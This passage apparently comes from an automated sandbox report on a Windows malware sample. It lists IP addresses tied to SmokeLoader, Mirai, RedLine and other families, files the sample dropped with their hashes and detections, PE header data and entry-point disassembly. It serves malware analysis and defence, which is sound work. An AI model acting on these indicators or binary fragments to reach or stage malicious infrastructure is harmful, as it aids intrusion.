                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 210.182.29.70
                                                  8qH833yMA5.elfGet hashmaliciousMiraiBrowse
                                                  • 112.76.76.166
                                                  file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                  • 211.119.84.112
                                                  afaO9EP4I2.exeGet hashmaliciousBabuk, DjvuBrowse
                                                  • 211.168.53.110
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 123.140.161.243
                                                  file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoaderBrowse
                                                  • 211.119.84.111
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 210.182.29.70
                                                  VYACm4h0WB.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                  • 211.171.233.126
                                                  fR2F583a5Y.elfGet hashmaliciousMiraiBrowse
                                                  • 121.67.88.158
                                                  Hg4L4TLIT0.elfGet hashmaliciousMiraiBrowse
                                                  • 112.222.229.84
                                                  1SSHp4VKId.elfGet hashmaliciousMiraiBrowse
                                                  • 112.222.229.22
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 211.53.230.67
                                                  Factura_Pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 211.115.92.181
                                                  6Q9c3evIBW.elfGet hashmaliciousMiraiBrowse
                                                  • 58.78.205.65
                                                  lBqZn5rbZ2.elfGet hashmaliciousMiraiBrowse
                                                  • 182.162.9.165
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 211.53.230.67
                                                  MegaCableSAdeCVMXXO9yrA8GlB.elfGet hashmaliciousMiraiBrowse
                                                  • 148.216.138.88
                                                  aa2e2uMrum.elfGet hashmaliciousMiraiBrowse
                                                  • 177.247.187.32
                                                  VYACm4h0WB.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                  • 200.92.136.254
                                                  file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                  • 200.92.136.254
                                                  pwhWdorS9R.elfGet hashmaliciousMiraiBrowse
                                                  • 177.227.216.199
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 200.92.136.254
                                                  w0FemtdVXq.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 148.216.152.130
                                                  oHqZ0zT7DZ.elfGet hashmaliciousMiraiBrowse
                                                  • 177.230.12.9
                                                  eOPFacwXf7.elfGet hashmaliciousMiraiBrowse
                                                  • 177.247.228.180
                                                  puGnofFCEf.elfGet hashmaliciousMiraiBrowse
                                                  • 201.132.184.44
                                                  IIw6S9lWlX.elfGet hashmaliciousMiraiBrowse
                                                  • 148.216.163.70
                                                  Xa6EadzxHo.elfGet hashmaliciousMiraiBrowse
                                                  • 201.165.161.125
                                                  UopRhMfyUw.elfGet hashmaliciousMiraiBrowse
                                                  • 177.231.211.53
                                                  e84dV3jzGY.elfGet hashmaliciousMiraiBrowse
                                                  • 177.245.137.10
                                                  BgL6t8Fl3u.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 200.92.136.254
                                                  6kg217B1to.elfGet hashmaliciousMiraiBrowse
                                                  • 177.247.228.179
                                                  KqVmsPag8G.elfGet hashmaliciousMiraiBrowse
                                                  • 189.197.247.192
                                                  Ug4sjfbJfF.elfGet hashmaliciousMiraiBrowse
                                                  • 148.216.187.69
                                                  ElsY83YuSo.elfGet hashmaliciousMiraiBrowse
                                                  • 148.216.114.88
                                                  lzV0k2sZ23.elfGet hashmaliciousMiraiBrowse
                                                  • 187.241.191.232

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllfile.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                    indicat.exeGet hashmaliciousVidarBrowse
                                                      file.exeGet hashmaliciousPrivateLoader, RisePro StealerBrowse
                                                        rj51W7g00R.exeGet hashmaliciousRedLineBrowse
                                                          UIB9S0uVzu.exeGet hashmaliciousStealc, VidarBrowse
                                                            egNeejjND4.exeGet hashmaliciousRedLineBrowse
                                                              toolspub1.exeGet hashmaliciousBabuk, Djvu, Fabookie, RedLine, SmokeLoader, zgRATBrowse
                                                                file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse

                                                                    Created / dropped Files

                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_EDBC.exe_e1d68d6de7e65ab8f5fe3cfa7228d85fdd39528_0bc9349f_180f0519\Report.wer

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.7433853065755502
                                                                    Encrypted:false
                                                                    SSDEEP:96:I/FPWQphY/p3dh7/7ebS3pXIQcQfc6FcEDcw3+se+HbHg/8BRTf32kEJ8Imov9OD:mVlhY/pdHxBJacjpq/u7s9S274Itr
                                                                    MD5:CDA84DD45E0458677369F9CC33D35117
                                                                    SHA1:942222A1AB240F239579ABFA6A3BF9A7296503BB
                                                                    SHA-256:6EE614D74251A64A1D57C393FA4657CCF01A617254C6C83283291CAA489500D9
                                                                    SHA-512:AEBAFC3C92D81FD8037D3DD3D72CAF4AE8340DCA913B409E8E845198DF0CBE589B10B0551A0FCB0EFB7039B9234ACE4868F894BC63E07E9A29ABA9020C699E15
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.0.7.9.3.3.1.7.5.8.6.5.1.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.0.7.9.3.3.1.8.0.0.8.3.9.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.a.4.b.9.c.f.-.2.0.6.b.-.4.2.b.e.-.9.9.1.1.-.d.8.8.2.3.0.b.c.5.6.8.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.b.9.c.3.6.2.-.c.3.4.e.-.4.7.7.c.-.8.0.e.e.-.e.b.e.2.8.1.2.d.5.b.0.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.D.B.C...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.c.8.-.0.0.0.1.-.0.0.2.8.-.e.b.6.5.-.3.1.f.2.c.e.f.5.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.9.f.9.5.c.3.2.e.7.e.e.2.f.9.8.f.d.3.3.8.6.f.5.c.b.3.9.b.8.d.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.f.e.d.d.5.e.f.3.9.f.2.3.2.5.9.6.3.e.f.e.7.7.4.2.4.0.9.9.8.d.1.b.e.6.c.a.c.d.!.E.D.B.C...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.1.0././.0.3.:.

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB17.tmp.dmp

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Oct 3 07:55:17 2023, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):41556
                                                                    Entropy (8bit):1.8938926996652912
                                                                    Encrypted:false
                                                                    SSDEEP:96:5Z8p18dGYJrYpJI4+woi7dqnzU/iXIA2K4/hn2OCD4FdcOPs/DGCGZWD2sWI0kWA:gsNYphCOdDn2OCD4FdJsY82/6BFW
                                                                    MD5:9230436521A9C996B8A25209D43FC4CC
                                                                    SHA1:58BE7969007E034D1ACEE4BA0135C9C011C43EBD
                                                                    SHA-256:CBC3D5A716FC1CEC8375A94FD0260DE1962A12D933A2FDB728656EEDD720E90B
                                                                    SHA-512:122A6B547EAA6E81ED9015CABE31F357018FD0F48F4DB572CA17DA44E1473555D8BEF8938A134C9C55B2DF02CB10E65B32DE7F8D0AF80F6F0DC1010F090751C9
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:MDMP....... ..........e.........................................#..........T.......8...........T...........................................................................................................U...........B......0.......GenuineIntelW...........T..............e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBB4.tmp.WERInternalMetadata.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8320
                                                                    Entropy (8bit):3.6932976086495057
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNimp6GrZ6YpjSU74gmf7SM++pDM89bqqGqsf4Om:RrlsNiY6GN6YNSU74gmf7S6qqGJfo
                                                                    MD5:BF90B98F0588866117C8C61FD3DF184F
                                                                    SHA1:A428BABB896F347FE48074FBA1578A0F04E982D8
                                                                    SHA-256:A4D55F6A620FBDCEBABCD90A4A71A823B4B0BCFAAA708FDC27B3D22805445A22
                                                                    SHA-512:A528FB8C2DDF4A3F2146AC08A4E9D32FB3433FFDDCE20911630E3E529E11D808B7CD328659EAB3B3F0DE8FF9D683804A055DE1235C9CF43D15F3FEA12745163C
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.6.4.<./.P.i.d.>.......

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBE4.tmp.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4622
                                                                    Entropy (8bit):4.431404271441674
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zsmJgtWI9dxWgc8sqYj/A/8fm8M4Jgp6Faa+q8vnp3pgpUtHdd:uITf8eggrsqYbhJkBaKp3pgmt9d
                                                                    MD5:4FB8D386EAF5A6CBE5C94AF9B33D5A55
                                                                    SHA1:E8B681C8B9BDD9D52FF7FB6E01FE7CF026D7E4FE
                                                                    SHA-256:88A642CE8BDBB9803330F21E072635D165EC8B900757E2E979BB7438E62158EB
                                                                    SHA-512:A32B43CEB7BFB2DCE68E82E577156EF921D916173A4C897FB1C6DD534E3871F9B1929D1FC9283D00BAB517D743CB0846A77D09898A34E274D338B7492A040E74
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2244545" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6E11.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\6E11.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1362
                                                                    Entropy (8bit):5.346977539202287
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLU84qpE4KI2KDE4KhKYIqDcfJKhuE4pqJE4klEE46k6AE4KIb:Mgv2HKI2YHKhBUouHkJHklEH6wHKY
                                                                    MD5:08121FC2C27784C587C3AE5926E51DDC
                                                                    SHA1:1BC421D1073F5D5F44B17783EF1234766AE9411D
                                                                    SHA-256:C2AE3A7704576F73616A2EBE9698501B7CCD2E6DC466E2CD9DCAB167D0E5872F
                                                                    SHA-512:D1DA8E67B6A3C15D99280296C08F47D9BB9BF22A05ABC8A36E08B59697F624718A3EA3DD3EA39DAD363279C8B7361CF5B5A0071644612AF04B9314E3291F4853
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\b6866d120f1141e4ed1a9336885d9b88\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\89672248685841ebbef19edc0e2fb2bf\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, Publi

                                                                    C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                    Download File
                                                                    Process:C:\Windows\explorer.exe
                                                                    File Type:JSON data
                                                                    Category:modified
                                                                    Size (bytes):984
                                                                    Entropy (8bit):5.227423502376633
                                                                    Encrypted:false
                                                                    SSDEEP:24:Yq6CUXyhm5IUmtQlbNdB6hm5VUmtQlz0Jahm5SUmtQlHZ6T06Mhm5vUmtQlbxdB8:YqDUXycIwbNdUcpwz0JacWwHZ6T06Mcb
                                                                    MD5:D9512E54D33D06E68E0C0D36726F7776
                                                                    SHA1:2E2ED852C188E0F96FCF861D7B73B8C479379845
                                                                    SHA-256:C70B840F192B885EF63C8426B0667EF175424A96DEC79A988C9525AD8E6997D2
                                                                    SHA-512:AAFCD49F2C87D4D43076CB4C1357FFAC9AB224ADBD4CEB06961755A0D6305D550090DDA34CAAA3C9B2700EF182CC9D6000BAB87A1A31D15A6A9F7565F60BA515
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2360844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2350844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2340844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2330844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2320844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2310844864,"LastSwitchedHighPart":30747916,"PrePopulated":true}]}

                                                                    C:\Users\user\AppData\Local\Temp\6E11.exe

                                                                    Download File
                                                                    Process:C:\Windows\explorer.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):3413536
                                                                    Entropy (8bit):7.252446325799637
                                                                    Encrypted:false
                                                                    SSDEEP:49152:tn37OXnskBCIZCtnLi3R8CzA1+g50U7PKDR/9QKiG7PrznN:ti4Li3R8sE+g5x2t/9/T9
                                                                    MD5:4527E3FE757DD266980F572C43F22EF3
                                                                    SHA1:BBA8BAE79D53F6B3DB43E82C85D0090B7934C8F6
                                                                    SHA-256:C5DC9C7BA82D0573EAD80F7174706AD1A5432616CE5602D1EC7F778F910136B7
                                                                    SHA-512:984179C7E0FFCDAB3D4E8C67ECA21918D61D06EC68CE1529BA21BF4C4E839BB05CDBD9B6A69BC7424C459650DA7D9813980765E4E25AE2A11ECE64A428EC41DD
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\AppData\Local\Temp\6E11.exe, Author: ditekSHen
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P...1...........1.. ....2...@.. ........................3......p4...@...................................1.K.....2...............3. .....3.....k.1.............................................. ............... ..H............text...$.1.. ....1................. ..`.rsrc.........2.......1.............@..@.reloc........3.......3.............@..B..................1.....H.......hD..............h..... .........................................:+.(..5E.(....*.V+.(.,.?..(....8.....*..B+.(..J:~.......*...6+.(f.6a~....*...0..........+.(*.Me8........E..../...K...k...J...8*...s.........8....s......... .....9....&8....s......... .....:....&8....*s......... .....:....& ....8....s......... ....8l....0..Z.......+.(.W0\ ........8........E....'.......8"....~....o...... ....(....9....&8....8....8......*...0..M.......+.(.FkK8/.......E........8....8.... ....

                                                                    C:\Users\user\AppData\Local\Temp\EDBC.exe

                                                                    Download File
                                                                    Process:C:\Windows\explorer.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):624640
                                                                    Entropy (8bit):6.987560195168364
                                                                    Encrypted:false
                                                                    SSDEEP:12288:tAtOTnK5dEXnMCyoW32HcBW4s1TojHZPT/GLVjUohlQ3xIKrgWGvx:tDT4O4v3c6WjToj5PT+LpUo+uM8x
                                                                    MD5:59E6F40D24C3EA84FA3BCF55B8F72C9D
                                                                    SHA1:FDFEDD5EF39F2325963EFE774240998D1BE6CACD
                                                                    SHA-256:433066AFD2579211323F9FE6AC6945B354B5422CAF932DABE4F9101BF6C71AD3
                                                                    SHA-512:54A08BAE9ECE1FCCB6E4D9BBC50E0D3BBB2E165A5E484A345E9BC5F2DE9AEDA0DA41C5737FA7F9B8E5BEBE957F69604C6B09CD452C4036958631C8461B83D894
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=j.hy.~;y.~;y.~;.y}:r.~;.y{:..~;.yz:m.~;6wz:h.~;.y.:p.~;y..;..~;6w{:G.~;6w}:o.~;.w{:x.~;.w~:x.~;.w.;x.~;.w|:x.~;Richy.~;........................PE..L.....e...............".x...........b............@.......................................@.........................p...P.......d...............................h.......................................@............................................text....v.......x.................. ..`.rdata...............|..............@..@.data....e...0...Z..................@....rsrc................l..............@..@.reloc..h............n..............@..B........................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\6E11.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):760320
                                                                    Entropy (8bit):6.561572491684602
                                                                    Encrypted:false
                                                                    SSDEEP:12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
                                                                    MD5:544CD51A596619B78E9B54B70088307D
                                                                    SHA1:4769DDD2DBC1DC44B758964ED0BD231B85880B65
                                                                    SHA-256:DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
                                                                    SHA-512:F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: indicat.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: rj51W7g00R.exe, Detection: malicious, Browse
                                                                    • Filename: UIB9S0uVzu.exe, Detection: malicious, Browse
                                                                    • Filename: egNeejjND4.exe, Detection: malicious, Browse
                                                                    • Filename: toolspub1.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\aueuggs

                                                                    Download File
                                                                    Process:C:\Windows\explorer.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):302592
                                                                    Entropy (8bit):5.389538931745946
                                                                    Encrypted:false
                                                                    SSDEEP:3072:NF/UIMBCdB8/sD2bFtBKXRo8G7lWsoSywCo62qXSuqWRlGhiVy:r/UIKC38/sD2bFeXRIPorOK/bRlg
                                                                    MD5:EC1D1CD9D43698631CEB1157E680A00A
                                                                    SHA1:FE62F6419EDCA78ED9FF69B7CE0251E0DFDE76E6
                                                                    SHA-256:A131B5CB6DD4B0DAEEA80EDA409B3957FC9D7D33B0A4058E19D28B9CDEBB51B6
                                                                    SHA-512:CCBFF7F3B4B35197ECC0D532DA87CECA859BF33C583A148A3A9DC5B92DB1D3EA39EA5F91ED44A57A6DA236ACD0A6DDE841BB6B5501AAC798B5D9BCA62DBB4DAA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 34%
                                                                    • Antivirus: Virustotal, Detection: 46%, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................S.v.....p....D.....E.....}......N...A.....t.....s....Rich...........................PE..L......b.............................Z............@..................................(......................................$...P....@..P............................................................D..@............................................text............................... ..`.data...,x.......>..................@....rsrc...P....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\aueuggs:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Windows\explorer.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):5.389538931745946
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:file.exe
                                                                    File size:302'592 bytes
                                                                    MD5:ec1d1cd9d43698631ceb1157e680a00a
                                                                    SHA1:fe62f6419edca78ed9ff69b7ce0251e0dfde76e6
                                                                    SHA256:a131b5cb6dd4b0daeea80eda409b3957fc9d7d33b0a4058e19d28b9cdebb51b6
                                                                    SHA512:ccbff7f3b4b35197ecc0d532da87ceca859bf33c583a148a3a9dc5b92db1d3ea39ea5f91ed44a57a6da236acd0a6dde841bb6b5501aac798b5d9bca62dbb4daa
                                                                    SSDEEP:3072:NF/UIMBCdB8/sD2bFtBKXRo8G7lWsoSywCo62qXSuqWRlGhiVy:r/UIKC38/sD2bFeXRIPorOK/bRlg
                                                                    TLSH:6454AF1376D0FC21D4666A314D29C2A53B2EFCA19E6967DB33983F3B49701E19A72703
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................S.v.......p.......D.......E.......}.........N.....A.......t.......s.....Rich............................PE..L..

                                                                    File Icon

                                                                    Icon Hash:455585a552494941

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x405ad7
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x62F1D499 [Tue Aug 9 03:29:29 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:22101b09b25f37226d51fdc3f87abcff

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007FA448877D29h
                                                                    jmp 00007FA448872C5Eh
                                                                    mov edi, edi
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 20h
                                                                    mov eax, dword ptr [ebp+08h]
                                                                    push esi
                                                                    push edi
                                                                    push 00000008h
                                                                    pop ecx
                                                                    mov esi, 00401354h
                                                                    lea edi, dword ptr [ebp-20h]
                                                                    rep movsd
                                                                    mov dword ptr [ebp-08h], eax
                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                    pop edi
                                                                    mov dword ptr [ebp-04h], eax
                                                                    pop esi
                                                                    test eax, eax
                                                                    je 00007FA448872DDEh
                                                                    test byte ptr [eax], 00000008h
                                                                    je 00007FA448872DD9h
